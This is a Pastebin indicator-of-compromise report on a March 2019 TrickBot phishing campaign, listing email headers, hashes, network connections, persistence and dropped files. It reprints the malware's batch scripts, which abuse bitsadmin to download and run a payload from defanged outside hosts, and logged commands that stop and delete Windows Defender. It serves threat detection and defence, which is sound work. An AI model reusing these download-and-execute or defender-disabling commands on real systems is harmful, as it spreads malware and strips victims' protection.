SHARE
TWEET

#trickbot_070319

VRad Mar 10th, 2019 (edited) 184 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #trickbot #W97M #AutoClose #BAT #BITS
  2.  
  3. https://pastebin.com/Vt02288z
  4.  
  5. previous contact:
  6. 06/02/19    https://pastebin.com/70KhU3a4
  7. 05/10/18    https://pastebin.com/75KNqwCf
  8. 02/10/18    https://pastebin.com/fm5Ug69G
  9. 24/09/18    https://pastebin.com/LjuNyGfn
  10.  
  11. FAQ:
  12. https://radetskiy.wordpress.com/2018/10/19/ioc_trickbot_051018/
  13. https://myonlinesecurity.co.uk/fake-paychex-tax-verification-documents-delivers-trickbot/
  14. https://github.com/DidierStevens/DidierStevensSuite/blob/master/vba.yara
  15.  
  16. attack_vector
  17. --------------
  18. email attach .doc > macro_AutoClose > 4 bat > BITS > GET > AppData\Roaming\wnetwork\*.exe
  19.  
  20. email_headers
  21. --------------
  22. Received: from paychex.email ([95.211.163.2])
  23. Received: by paychex.email for <user00@org88.victim0.com>;
  24. (envelope-from <J.Clark-user00=org88.victim0.com@paychex.email>)
  25. Subject:  RE: Tax verification documents
  26. From: "Jeff Clark - Paychex" <J.Clark@paychex.email>
  27. Date: Thu, 7 Mar 2019 14:33:37 -0500
  28. To: user00@org88.victim0.com
  29.  
  30. files
  31. --------------
  32. SHA-256 a2ee9205643518f97d02ba0a70105a920c316b599755439b03f20433eecff625
  33. File name   Verification_Documents.doc      [Composite Document File V2 Document, Little Endian]
  34. File size   100.5 KB
  35.  
  36. SHA-256 da252efc670493820e953a0472959d21ca2dd85b2d4ed25b693d1ced25a02fbd
  37. File name   za.ebali                [PE32 executable (GUI) Intel 80386, for MS Windows]
  38. File size   245 KB
  39.  
  40. activity
  41. **************
  42. Yahhop1.bat
  43. --------------
  44. cmd /r cmd /c copy /Y /V %windir%\system32\bitsadmin.exe %temp%\@n10FGA.exe && %temp%\Yahhop2.bat && %temp%\Yahhop3.bat && %temp%\Yahhop4.bat
  45.  
  46. Yahhop2.bat
  47. --------------
  48. cmd /r cmd /c ping -n 2 yasgold{.} com
  49. if %errorlevel%==0 (set slomw=yasgold{.} com) else (set slomw=mitreart{.} com)
  50.  
  51. Yahhop3.bat
  52. --------------
  53. cmd /r cmd /c %temp%\@n10FGA /reset && %temp%\@n10FGA /CREATE /DOWNLOAD Taur && %temp%\@n10FGA /setNoProgressTimeout Taur 300 && %temp%\@n10FGA /setMinRetryDelay Taur 7 && %temp%\@n10FGA /ADDFILE Taur http://%slomw%/za.ebali %temp%\ebali.exe && %temp%\@n10FGA /SetSecurityFlags Taur 30 && %temp%\@n10FGA /SETMAXDOWNLOADTIME Taur 500 && %temp%\@n10FGA /SetPeerCachingFlags Taur 3 && %temp%\@n10FGA /RESUME Taur && timeout /t 147 /nobreak && %temp%\@n10FGA /COMPLETE Taur
  54.  
  55. Yahhop4.bat
  56. --------------
  57. cmd /r cmd /c timeout /t 5 /nobreak && %temp%\ebali.exe && del /f /q %temp%\Yahhop1.bat %temp%\Yahhop2.bat %temp%\Yahhop3.bat %temp%\Yahhop4.bat %temp%\Yahhop5.bat %temp%\@n10FGA.exe
  58.  
  59. @
  60.  
  61. PL_SRC:     http://yasgold{.} com/za.ebali
  62.         http://mitreart{.} com/za.ebali
  63.  
  64. netwrk
  65. --------------
  66. http
  67. 185.56.145.142  yasgold{.} com      HEAD /za.ebali      HTTP/1.1        Microsoft BITS/7.5
  68. 116.203.16.95   ip.anysrc.net       GET /plain      HTTP/1.1        Mozilla/5.0
  69. 67.27.235.254   ctldl.windowsupdate.com GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1   Microsoft-CryptoAPI/6.1
  70.  
  71. ssl
  72. 185.174.174.15
  73. 82.146.57.38
  74. 195.123.246.121
  75.  
  76. comp
  77. --------------
  78. svchost.exe 872 TCP localhost   49376   185.56.145.142  80  ESTABLISHED
  79. svchost.exe 1688    TCP localhost   49377   116.203.16.95   80  ESTABLISHED
  80. svchost.exe 1688    TCP localhost   49378   177.107.51.162  449 SYN_SENT
  81. svchost.exe 1688    TCP localhost   49381   138.204.132.88  449 SYN_SENT
  82. svchost.exe 1688    TCP localhost   49385   67.27.235.254   80  ESTABLISHED
  83. svchost.exe 1688    TCP localhost   49384   185.174.174.15  443 ESTABLISHED
  84. svchost.exe 1688    TCP localhost   49386   82.146.57.38    443 ESTABLISHED
  85. svchost.exe 1688    TCP localhost   49389   195.123.246.121 443 ESTABLISHED
  86.  
  87. proc
  88. --------------
  89. 1st
  90. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  91. C:\Windows\SysWOW64\cmd.exe cmd /r cmd /c copy /Y /V %windir%\system32\bitsadmin.exe %temp%\00JO0!l.exe && %temp%\Yahhop2.bat && %temp%\Yahhop3.bat && %temp%\Yahhop4.bat
  92. C:\Windows\SysWOW64\cmd.exe /c copy /Y /V C:\Windows\system32\bitsadmin.exe C:\tmp\00JO0!l.exe
  93. C:\Windows\SysWOW64\cmd.exe /r cmd /c ping -n 2 yasgold{.} com
  94. C:\Windows\SysWOW64\cmd.exe /c ping -n 2 yasgold{.} com
  95. C:\Windows\SysWOW64\PING.EXE -n 2 yasgold{.} com
  96. C:\Windows\SysWOW64\cmd.exe  /r cmd /c C:\tmp\00JO0!l /reset
  97. C:\Windows\SysWOW64\cmd.exe  /c C:\tmp\00JO0!l /reset
  98. C:\tmp\00JO0!l  /reset
  99.  
  100. C:\tmp\00JO0!l  /CREATE /DOWNLOAD Taur
  101. C:\tmp\00JO0!l  /setNoProgressTimeout Taur 300
  102. C:\tmp\00JO0!l  /setMinRetryDelay Taur 7
  103. C:\tmp\00JO0!l  /ADDFILE Taur http://yasgold{.} com/za.ebali C:\tmp\ebali.exe
  104. C:\tmp\00JO0!l  /SetSecurityFlags Taur 30
  105. C:\tmp\00JO0!l  /SETMAXDOWNLOADTIME Taur 500
  106. C:\tmp\00JO0!l  /SetPeerCachingFlags Taur 3
  107. C:\tmp\00JO0!l  /RESUME Taur
  108. C:\Windows\SysWOW64\timeout.exe timeout  /t 147 /nobreak
  109. C:\tmp\00JO0!l  /COMPLETE Taur
  110.  
  111. C:\Windows\SysWOW64\cmd.exe  /r cmd /c timeout /t 5 /nobreak
  112. C:\tmp\ebali.exe  
  113. C:\Windows\system32\cmd.exe /c sc stop WinDefend
  114. C:\Windows\system32\cmd.exe /c sc delete WinDefend
  115. C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  116.  
  117. C:\Users\operator\AppData\Roaming\wnetwork\ebamj.exe
  118. C:\Windows\system32\cmd.exe /c sc stop WinDefend
  119. C:\Windows\system32\cmd.exe /c sc delete WinDefend
  120. C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  121. C:\Windows\system32\svchost.exe
  122.  
  123. 2nd
  124. C:\Windows\system32\svchost.exe -k netsvcs
  125. C:\Windows\system32\taskeng.exe {4A5E0F1F-7A3C-4339-A10A-8292EA54F4A0} S-1-5-21-136527031-2493574210-1221074019-1000:APM11\operator:Interactive:[1]
  126. C:\Users\operator\AppData\Roaming\wnetwork\ebamj.exe
  127. C:\Windows\system32\cmd.exe /c sc stop WinDefend
  128. C:\Windows\system32\cmd.exe /c sc delete WinDefend
  129. C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  130. C:\Windows\system32\svchost.exe
  131.  
  132. persist
  133. --------------
  134. \Windows Network           
  135. c:\users\operator\appdata\roaming\wnetwork\ebamj.exe    07.03.2019 18:12   
  136.  
  137. drop
  138. --------------
  139. C:\tmp\VBE\MSForms.exd
  140. C:\tmp\Yahhop1.bat      [removed]
  141. C:\tmp\Yahhop2.bat      [removed]
  142. C:\tmp\Yahhop3.bat      [removed]
  143. C:\tmp\Yahhop4.bat      [removed]
  144. C:\tmp\00JO0!l.exe      [removed]
  145. C:\tmp\BIT7B59.tmp      [removed]
  146. C:\tmp\ebali.exe
  147.  
  148. C:\Users\operator\AppData\Roaming\wnetwork\ebamj.exe
  149. C:\Users\operator\AppData\Roaming\wnetwork\Greenshot.ini
  150. C:\Users\operator\AppData\Roaming\wnetwork\Data
  151.  
  152. # # #
  153. https://www.virustotal.com/#/file/a2ee9205643518f97d02ba0a70105a920c316b599755439b03f20433eecff625/details
  154. https://www.virustotal.com/#/file/da252efc670493820e953a0472959d21ca2dd85b2d4ed25b693d1ced25a02fbd/details
  155. https://analyze.intezer.com/#/analyses/b11279cb-4c9a-4e59-8605-e6a96c078034
  156.  
  157. VR
  158.  
  159. @
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top